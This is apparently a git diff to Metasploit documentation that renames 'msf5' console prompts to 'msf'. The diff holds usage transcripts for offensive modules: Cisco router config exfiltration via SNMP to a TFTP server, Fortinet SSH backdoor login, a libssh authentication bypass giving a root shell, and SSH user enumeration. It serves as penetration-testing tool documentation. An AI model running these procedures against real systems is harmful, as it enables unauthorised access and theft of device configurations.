Stats\x0d\x0atotal_connections_received:5\x0d\x0atotal_commands_processed:3\x0d\x0ainstantaneous_ops_per_sec:0\x0d\x0atotal_net_input_bytes:79\x0d\x0atotal_net_output_bytes:8191\x0d\x0ainstantaneous_input_kbps:0.00\x0d\x0ainstantaneous_output_kbps:0.00\x0d\x0arejected_connections:0\x0d\x0async_full:0\x0d\x0async_partial_ok:0\x0d\x0async_partial_err:0\x0d\x0aexpired_keys:0\x0d\x0aexpired_stale_perc:0.00\x0d\x0aexpired_time_cap_reached_count:0\x0d\x0aevicted_keys:0\x0d\x0akeyspace_hits:0\x0d\x0akeyspace_misses:0\x0d\x0apubsub_channels:0\x0d\x0apubsub_patterns:0\x0d\x0alatest_fork_usec:0\x0d\x0amigrate_cached_sockets:0\x0d\x0aslave_expires_tracked_keys:0\x0d\x0aactive_defrag_hits:0\x0d\x0aactive_defrag_misses:0\x0d\x0aactive_defrag_key_hits:0\x0d\x0aactive_defrag_key_misses:0\x0d\x0a\x0d\x0a# Replication\x0d\x0arole:master\x0d\x0aconnected_slaves:0\x0d\x0amaster_replid:0d4b69672220406a209cf68d63e22215f5bc8741\x0d\x0amaster_replid2:0000000000000000000000000000000000000000\x0d\x0amaster_repl_offset:0\x0d\x0asecond_repl_offset:-1\x0d\x0arepl_backlog_active:0\x0d\x0arepl_backlog_size:1048576\x0d\x0arepl_backlog_first_byte_offset:0\x0d\x0arepl_backlog_histlen:0\x0d\x0a\x0d\x0a# CPU\x0d\x0aused_cpu_sys:0.66\x0d\x0aused_cpu_user:0.45\x0d\x0aused_cpu_sys_children:0.00\x0d\x0aused_cpu_user_children:0.00\x0d\x0a\x0d\x0a# Cluster\x0d\x0acluster_enabled:0\x0d\x0a\x0d\x0a# Keyspace [*] 172.17.0.3:6379 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/rsync/modules_list.md b/documentation/modules/auxiliary/scanner/rsync/modules_list.md index 6ab23df945..2d2d322251 100644 --- a/documentation/modules/auxiliary/scanner/rsync/modules_list.md +++ b/documentation/modules/auxiliary/scanner/rsync/modules_list.md 
@@ -67,10 +67,10 @@ rsync3:VU&A1We5DEa8M6^8" > /etc/rsyncd.secrets``` With verbose set to `false`: ``` - msf5 > use auxiliary/scanner/rsync/modules_list - msf5 auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/rsync/modules_list + msf auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/rsync/modules_list) > run + msf auxiliary(scanner/rsync/modules_list) > run [+] 10.168.202.216:873 - 3 rsync modules found: read only files, writable, authenticated ``` @@ -78,12 +78,12 @@ With verbose set to `false`: With verbose set to `true`: ``` - msf5 > use auxiliary/scanner/rsync/modules_list - msf5 auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/rsync/modules_list + msf auxiliary(scanner/rsync/modules_list) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/rsync/modules_list) > set verbose true + msf auxiliary(scanner/rsync/modules_list) > set verbose true verbose => true - msf5 auxiliary(scanner/rsync/modules_list) > run + msf auxiliary(scanner/rsync/modules_list) > run [+] 10.168.202.216:873 - 3 rsync modules found: read only files, writable, authenticated diff --git a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md index 899cfb4000..e94664a45a 100644 --- a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md +++ b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md 
@@ -37,8 +37,8 @@ With this module you can list the config files that SAP loads when starts the SA ``` -msf5 > use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles -msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > show options +msf > use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles +msf auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles): @@ -52,9 +52,9 @@ Module options (auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles): URI / no Path to the SAP Management Console VHOST no HTTP server virtual host - msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > set RHOSTS 192.168.10.45 + msf auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > set RHOSTS 192.168.10.45 RHOSTS => 192.168.10.45 - msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > run + msf auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > run [...] ``` diff --git a/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md b/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md index 7bf2976e78..c555c1ce5f 100644 --- a/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md +++ b/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md @@ -21,7 +21,7 @@ If the target was unable to process the Modbus message, a Modbus exception messa Successful results from the scan will be stored as a `note` in the framework. You can access these notes by typing `note` in the console. ``` -msf5 auxiliary(scanner/scada/modbus_banner_grabbing) > notes +msf auxiliary(scanner/scada/modbus_banner_grabbing) > notes Notes ===== diff --git a/documentation/modules/auxiliary/scanner/sip/options_tcp.md b/documentation/modules/auxiliary/scanner/sip/options_tcp.md index 4b846871c9..d0f2632815 100644 --- a/documentation/modules/auxiliary/scanner/sip/options_tcp.md +++ b/documentation/modules/auxiliary/scanner/sip/options_tcp.md 
@@ -18,10 +18,10 @@ ``` -msf5 > use auxiliary/scanner/sip/options_tcp -msf5 auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2 +msf > use auxiliary/scanner/sip/options_tcp +msf auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 auxiliary(scanner/sip/options_tcp) > run +msf auxiliary(scanner/sip/options_tcp) > run [*] 2.2.2.2:5060 - 2.2.2.2:5060 tcp SIP/2.0 200 OK: {"Server"=>"Cisco-SIPGateway/IOS-12.x", "Allow"=>"INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER"} [*] 2.2.2.2:5060 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/smb/smb_version.md b/documentation/modules/auxiliary/scanner/smb/smb_version.md index afda7d8c83..4e181df7a6 100644 --- a/documentation/modules/auxiliary/scanner/smb/smb_version.md +++ b/documentation/modules/auxiliary/scanner/smb/smb_version.md @@ -39,9 +39,9 @@ identify the information about the host operating system. This is an example run of a network with several different version of Windows, metasploit 1 and 2, and a NAS device running SAMBA. ``` -msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.0/24 +msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.0/24 RHOSTS => 192.168.159.0/24 -msf5 auxiliary(scanner/smb/smb_version) > show options +msf auxiliary(scanner/smb/smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): 
@@ -50,7 +50,7 @@ Module options (auxiliary/scanner/smb/smb_version): RHOSTS 192.168.159.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' THREADS 15 yes The number of concurrent threads (max one per host) -msf5 auxiliary(scanner/smb/smb_version) > run +msf auxiliary(scanner/smb/smb_version) > run [*] 192.168.159.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (guid:{faf5534c-d125-4081-aa2a-cf3256415908}) (authentication domain:MSFLAB) [*] 192.168.159.10:445 - Host could not be identified: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) @@ -74,5 +74,5 @@ msf5 auxiliary(scanner/smb/smb_version) > run [*] 192.168.159.0/24: - Scanned 234 of 256 hosts (91% complete) [*] 192.168.159.0/24: - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/smb/smb_version) > +msf auxiliary(scanner/smb/smb_version) > ``` diff --git a/documentation/modules/auxiliary/scanner/smtp/smtp_version.md b/documentation/modules/auxiliary/scanner/smtp/smtp_version.md index f20d26d2e8..b1b1685df1 100644 --- a/documentation/modules/auxiliary/scanner/smtp/smtp_version.md +++ b/documentation/modules/auxiliary/scanner/smtp/smtp_version.md 
@@ -26,10 +26,10 @@ In this case, we don't need to configure all the users and set up the server ful ### Postfix 3.3.0-1+b1 (Ubuntu package number) on Kali (using above config) ``` - msf5 > use auxiliary/scanner/smtp/smtp_version - msf5 auxiliary(scanner/smtp/smtp_version) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/smtp/smtp_version + msf auxiliary(scanner/smtp/smtp_version) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/smtp/smtp_version) > run + msf auxiliary(scanner/smtp/smtp_version) > run [+] 10.168.202.216:25 - 10.168.202.216:25 SMTP 220 rageKali.ragegroup ESMTP Postfix (Debian/GNU)\x0d\x0a ``` diff --git a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md index 2204fe0a2c..9c55421225 100644 --- a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md +++ b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md @@ -26,12 +26,12 @@ ### Cisco UC520-8U-4FXO-K9 running IOS 12.4 ``` -msf5 > setg rhosts 2.2.2.2 +msf > setg rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 > use auxiliary/scanner/snmp/cisco_config_tftp -msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set community private +msf > use auxiliary/scanner/snmp/cisco_config_tftp +msf auxiliary(scanner/snmp/cisco_config_tftp) > set community private community => private -msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run +msf auxiliary(scanner/snmp/cisco_config_tftp) > run [*] Starting TFTP server... [*] Scanning for vulnerable targets... 
@@ -55,10 +55,10 @@ was utilized to create this process. 1. Start the TFTP server ``` -msf5 > use auxiliary/server/tftp -msf5 auxiliary(server/tftp) > run +msf > use auxiliary/server/tftp +msf auxiliary(server/tftp) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/tftp) > +msf auxiliary(server/tftp) > [*] Starting TFTP server on 0.0.0.0:69... [*] Files will be served from /tmp [*] Uploaded files will be saved in /tmp 
@@ -67,27 +67,27 @@ msf5 auxiliary(server/tftp) > 2. Execute the SNMP commands. An integer is required to group the requests together, `666` is used in this example. ``` -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1 iso.3.6.1.4.1.9.9.96.1.1.1.1.2.666 = INTEGER: 1 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4 iso.3.6.1.4.1.9.9.96.1.1.1.1.3.666 = INTEGER: 4 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1 iso.3.6.1.4.1.9.9.96.1.1.1.1.4.666 = INTEGER: 1 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1" +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1" [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1" iso.3.6.1.4.1.9.9.96.1.1.1.1.5.666 = IpAddress: 1.1.1.1 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" iso.3.6.1.4.1.9.9.96.1.1.1.1.6.666 = STRING: "backup_config" -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 
i 1 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1 @@ -96,7 +96,7 @@ iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1 3. At this point the config is transferring, we need to wait a few seconds. Lastly, we'll remove `666` from the system. ``` -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6 iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6 @@ -105,7 +105,7 @@ iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6 4. Confirm we have our config file ``` -msf5 auxiliary(server/tftp) > ls -lah /tmp/backup_config +msf auxiliary(server/tftp) > ls -lah /tmp/backup_config [*] exec: ls -lah /tmp/backup_config -rw-r--r-- 1 root root 23K Oct 11 22:20 /tmp/backup_config diff --git a/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md b/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md index 48b294bce4..6f50bdd08c 100644 --- a/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md +++ b/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md 
@@ -49,14 +49,14 @@ Override_Config ### Cisco UC520-8U-4FXO-K9 running IOS 12.4 ``` -msf5 > setg rhosts 2.2.2.2 +msf > setg rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 > use auxiliary/scanner/snmp/cisco_upload_file -msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2 +msf > use auxiliary/scanner/snmp/cisco_upload_file +msf auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2 source => /tmp/backup_config2 -msf5 auxiliary(scanner/snmp/cisco_upload_file) > set community private +msf auxiliary(scanner/snmp/cisco_upload_file) > set community private community => private -msf5 auxiliary(scanner/snmp/cisco_upload_file) > run +msf auxiliary(scanner/snmp/cisco_upload_file) > run [*] Starting TFTP server... [*] Copying file backup_config2 to 2.2.2.2... @@ -69,17 +69,17 @@ msf5 auxiliary(scanner/snmp/cisco_upload_file) > run ``` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private` `COMMUNITY => private` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164` `LHOST => 10.20.164.164` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config` `action => Override_Config` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5` `rhosts => 10.20.205.5` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig` `source => /root/Desktop/newconfig` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run` +`msf auxiliary(scanner/snmp/cisco_upload_file) > run` `[*] Starting TFTP server...` `[*] Copying file newconfig to 10.20.205.5...` 
diff --git a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md index dc5725a87f..dc3ee7bb22 100644 --- a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md +++ b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md @@ -11,12 +11,12 @@ This module scans for the Fortinet SSH backdoor and creates sessions. ## Usage ``` -msf5 > use auxiliary/scanner/ssh/fortinet_backdoor -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 +msf > use auxiliary/scanner/ssh/fortinet_backdoor +msf auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 rhosts => 192.168.212.0/24 -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 +msf auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 threads => 100 -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run +msf auxiliary(scanner/ssh/fortinet_backdoor) > run [*] Scanned 54 of 256 hosts (21% complete) [+] 192.168.212.128:22 - Logged in as Fortimanager_Access @@ -31,7 +31,7 @@ msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run [*] Scanned 240 of 256 hosts (93% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 +msf auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 [*] Starting interaction with 1... FortiGate-VM # get system status diff --git a/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md b/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md index d1d46913f8..159b5e110c 100644 --- a/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md +++ b/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md 
@@ -134,23 +134,23 @@ OOB authentication packet always returns `true`. Positive testing against unpatched libssh 0.8.3: ``` -msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3 +msf > use auxiliary/scanner/ssh/libssh_auth_bypass +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3 rhosts => 172.28.128.3 -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222 +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222 rport => 2222 -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true spawn_pty => true -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true verbose => true -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched [*] Command shell session 1 opened (172.28.128.1:56981 -> 172.28.128.3:2222) at 2018-10-19 12:38:24 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1 +msf auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1 [*] Starting interaction with 1... # id 
@@ -168,11 +168,11 @@ tty Positive testing of shell commands using the `Execute` action: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute action => Execute -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a cmd => id; uname -a -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched 
@@ -181,53 +181,53 @@ uid=0(root) gid=0(root) groups=0(root) Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Negative testing against patched libssh 0.8.4: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [-] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.4 appears to be patched [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Negative testing against an insufficiently implemented libssh server: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched [-] 172.28.128.3:2222 - Net::SSH::ChannelOpenFailed: Session channel open failed (1) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched [-] 172.28.128.3:2222 - Net::SSH::ChannelRequestFailed: Shell/exec channel request failed [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Negative testing against OpenSSH: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22 +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22 rport => 22 -msf5 
auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:22 - Attempting authentication bypass [-] 172.28.128.3:22 - SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 does not appear to be libssh [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Confirming auth is still normally present using the OpenSSH client: diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md b/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md index 0306cd0f77..d0cb6a3b18 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md @@ -14,10 +14,10 @@ This module attempts to authenticate to Git servers using compromised SSH privat ## Usage ``` -msf5 > use auxiliary/scanner/ssh/ssh_enum_git_keys -msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh +msf > use auxiliary/scanner/ssh/ssh_enum_git_keys +msf auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh KEY_DIR => /Users/w/.ssh -msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > run +msf auxiliary(scanner/ssh/ssh_enum_git_keys) > run Git Access Data =============== diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md b/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md index 772ce12914..cea7fefe36 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md 
@@ -39,17 +39,17 @@ Check for false positives (random username). ## Usage ``` -msf5 > use auxiliary/scanner/ssh/ssh_enumusers -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted] +msf > use auxiliary/scanner/ssh/ssh_enumusers +msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted] rhosts => [redacted] -msf5 auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users +msf auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users [*] exec: echo $'wvu\nbcook' > users -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users +msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file users user_file => users -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set verbose true +msf auxiliary(scanner/ssh/ssh_enumusers) > set verbose true verbose => true -msf5 auxiliary(scanner/ssh/ssh_enumusers) > run +msf auxiliary(scanner/ssh/ssh_enumusers) > run [*] [redacted]:22 - SSH - Using malformed packet technique [*] [redacted]:22 - SSH - Starting scan @@ -57,9 +57,9 @@ msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [-] [redacted]:22 - SSH - User 'bcook' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack +msf auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack action => Timing Attack -msf5 auxiliary(scanner/ssh/ssh_enumusers) > run +msf auxiliary(scanner/ssh/ssh_enumusers) > run [*] [redacted]:22 - SSH - Using timing attack technique [*] [redacted]:22 - SSH - Starting scan @@ -67,7 +67,7 @@ msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [-] [redacted]:22 - SSH - User 'bcook' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/ssh_enumusers) > creds +msf auxiliary(scanner/ssh/ssh_enumusers) > creds Credentials =========== 
@@ -75,5 +75,5 @@ host origin service public private realm private_type ---- ------ ------- ------ ------- ----- ------------ [redacted] [redacted] 22/tcp (ssh) wvu -msf5 auxiliary(scanner/ssh/ssh_enumusers) > +msf auxiliary(scanner/ssh/ssh_enumusers) > ``` diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_version.md b/documentation/modules/auxiliary/scanner/ssh/ssh_version.md index 80328cacc9..846ddb1451 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_version.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_version.md @@ -44,10 +44,10 @@ Check for cryptographic issues. Defaults to `true` ### SSH-2.0 on GitHub ``` -msf5 > use auxiliary/scanner/ssh/ssh_version -msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com +msf > use auxiliary/scanner/ssh/ssh_version +msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com RHOSTS => github.com -msf5 auxiliary(scanner/ssh/ssh_version) > run +msf auxiliary(scanner/ssh/ssh_version) > run [*] 140.82.113.4 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMqqnkVzrm0SdG6UOoqKLsabgH5C9okWi0dh2l9GKJl [*] 140.82.113.4 - SSH server version: SSH-2.0-babeld-8405f9f3 @@ -89,7 +89,7 @@ msf5 auxiliary(scanner/ssh/ssh_version) > run ### Docker image ``` -msf5 > use auxiliary/scanner/ssh/ssh_version +msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > set rhosts 172.17.0.2 rhosts => 172.17.0.2 msf auxiliary(scanner/ssh/ssh_version) > set verbose true diff --git a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md index 280db80f7a..4c28e43cb0 100644 --- a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md +++ b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md 
